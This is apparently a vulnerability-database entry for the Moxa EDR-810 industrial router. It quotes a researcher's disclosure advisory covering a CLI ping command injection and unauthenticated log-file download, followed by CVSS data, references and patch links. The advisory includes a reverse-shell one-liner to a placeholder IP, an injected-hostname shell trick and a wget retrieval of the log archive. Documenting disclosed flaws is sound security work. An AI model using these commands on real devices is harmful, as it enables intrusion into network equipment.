var-201910-1701
Vulnerability from variot
Moxa EDR 810, all versions 5.1 and prior, allows an unauthenticated attacker to be able to retrieve some log files from the device, which may allow sensitive information disclosure. Log files must have previously been exported by a legitimate user. Moxa EDR 810 Contains a vulnerability related to information disclosure from log files.Information may be obtained. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges.
As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose†them.
The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa.
Many thanks to Moxa and ICS-CERT teams for their help.
Advisory
The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:
CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. A CVSS v3 base score of 4.3 has been calculated.
Exploitation
CVE-2019-10969 - Ping Command Injection
The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below:
Ping command injection
Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below: bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1
CVE-2019-10963 - Missing Access Control On Log Files
When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:
http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz An attacker can retrieve this archive without being authenticated on the Web interface as shown below:
wget http://192.168.0.1/MOXA_All_LOG.tar.gz
--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz Connexion à 192.168.0.1:80... connecté. requête HTTP transmise, en attente de la réponse... 200 OK Taille : 15724 (15K) [text/plain] Sauvegarde en : " MOXA_All_LOG.tar.gz "
MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s
2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]
tar ztvf MOXA_All_LOG.tar.gz
drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/ -rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini -rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini -rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini
Mitigation
It is recommended to install at least the firmware version 5.3 from Moxa website.
Timeline
2019-02-24: Vendor Disclosure 2019-02-24: Advisory sent to ICS-CERT 2019-09-30: Advisory published by Moxa 2019-10-01: Advisory published by ICS-CERT
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-1701",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "5.1"
},
{
"model": "edr-810 series",
"scope": "lte",
"trust": 0.8,
"vendor": "moxa",
"version": "5.1"
},
{
"model": "edr-810",
"scope": "lte",
"trust": 0.6,
"vendor": "moxa",
"version": "\u003c=5.1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "5.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10963"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RandoriSec",
"sources": [
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
],
"trust": 0.7
},
"cve": "CVE-2019-10963",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-10963",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-43364",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-10963",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10963",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-43364",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-005",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR 810, all versions 5.1 and prior, allows an unauthenticated attacker to be able to retrieve some log files from the device, which may allow sensitive information disclosure. Log files must have previously been exported by a legitimate user. Moxa EDR 810 Contains a vulnerability related to information disclosure from log files.Information may be obtained. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. \n\nAs usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to \u00e2\u20ac\u0153responsible disclose\u00e2\u20ac them. \n\nThe ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. \n\nMany thanks to Moxa and ICS-CERT teams for their help. \n\n\n\nAdvisory\n\nThe following two product vulnerabilities were identified in Moxa\u00e2\u20ac\u2122s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:\n\nCVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. A CVSS v3 base score of 4.3 has been calculated. \n\n\nExploitation\n\nCVE-2019-10969 - Ping Command Injection\n\nThe Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: \n\nPing command injection\n\nDue to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:\nbash -i \u003e\u0026 /dev/tcp/YOUR_IP_ADDRESS/1234 0\u003e\u00261\n\n\nCVE-2019-10963 - Missing Access Control On Log Files\n\nWhen a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:\n\nhttp://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz\nAn attacker can retrieve this archive without being authenticated on the Web interface as shown below:\n\n# wget http://192.168.0.1/MOXA_All_LOG.tar.gz\n--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz\nConnexion \u00c3 192.168.0.1:80... connect\u00c3\u00a9. \nrequ\u00c3\u00aate HTTP transmise, en attente de la r\u00c3\u00a9ponse... 200 OK\nTaille : 15724 (15K) [text/plain]\nSauvegarde en : \" MOXA_All_LOG.tar.gz \"\n\nMOXA_All_LOG.tar.gz 100%[====================================================================================================================================\u003e] 15,36K --.-KB/s ds 0s \n\n2019-02-13 17:35:19 (152 MB/s) - \" MOXA_All_LOG.tar.gz \" sauvegard\u00c3\u00a9 [15724/15724]\n\n# tar ztvf MOXA_All_LOG.tar.gz \ndrwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/\n-rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini\n-rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini\n-rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini\n\n\nMitigation\n\nIt is recommended to install at least the firmware version 5.3 from Moxa website. \n\n\n\nTimeline\n\n2019-02-24: Vendor Disclosure\n2019-02-24: Advisory sent to ICS-CERT\n2019-09-30: Advisory published by Moxa\n2019-10-01: Advisory published by ICS-CERT\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "PACKETSTORM",
"id": "154943"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10963",
"trust": 3.1
},
{
"db": "ICS CERT",
"id": "ICSA-19-274-03",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "154943",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-43364",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3697",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"id": "VAR-201910-1701",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
}
],
"trust": 1.2587301499999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
}
]
},
"last_update_date": "2023-12-18T12:43:15.457000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/support/search?psid=48041"
},
{
"title": "Patch for Moxa EDR-810 Information Disclosure Vulnerability (CNVD-2019-43364)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/192701"
},
{
"title": "Moxa EDR 810 Series Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=98757"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-532",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10963"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/154943/moxa-edr-810-command-injection-information-disclosure.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10963"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3697/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10969"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/moxa_all_log.tar.gz"
},
{
"trust": 0.1,
"url": "http://ip_address_moxa/moxa_all_log.tar.gz"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"date": "2019-10-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"date": "2019-10-23T18:25:18",
"db": "PACKETSTORM",
"id": "154943"
},
{
"date": "2019-10-08T19:15:09.900000",
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"date": "2019-10-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"date": "2019-10-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"date": "2021-10-28T13:24:14.003000",
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"date": "2021-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR 810 Vulnerable to information disclosure from log files",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
],
"trust": 0.6
}
}
Loading...
Loading...
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.